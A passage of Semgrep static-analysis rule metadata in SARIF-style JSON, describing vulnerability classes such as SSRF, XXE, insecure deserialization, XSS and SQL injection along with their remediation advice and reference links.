vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","id":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","name":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"help":{"markdown":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1)\n - [https://link.springer.com/chapter/10.1007/BFb0055716](https://link.springer.com/chapter/10.1007/BFb0055716)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://www.pycryptodome.org/src/cipher/pkcs1_v1_5](https://www.pycryptodome.org/src/cipher/pkcs1_v1_5)\n","text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","id":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","name":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","id":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","name":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","id":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","name":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"help":{"markdown":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication)\n - [https://cwe.mitre.org/data/definitions/287.html](https://cwe.mitre.org/data/definitions/287.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)\n","text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"helpUri":"https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","id":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","name":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A04:2021 Insecure Design","OWASP-A07:2021 Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","id":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","name":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep)\n - [https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html](https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"helpUri":"https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","id":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","name":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"helpUri":"https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","id":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","name":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express","id":"javascript.express.code.puppeteer-express.puppeteer-express","name":"javascript.express.code.puppeteer-express.puppeteer-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.puppeteer-express.puppeteer-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"help":{"markdown":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter)\n - [https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/](https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/)\n - [https://golang.org/pkg/io/#WriteString](https://golang.org/pkg/io/#WriteString)\n","text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","id":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","name":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli)\n - [https://github.com/MagicStack/asyncpg](https://github.com/MagicStack/asyncpg)\n - [https://magicstack.github.io/asyncpg/current/](https://magicstack.github.io/asyncpg/current/)\n","text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","id":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","name":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"help":{"markdown":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper)\n","text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper","id":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","name":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-textiowrapper"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"help":{"markdown":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable\n\nReferences:\n - [Semgrep 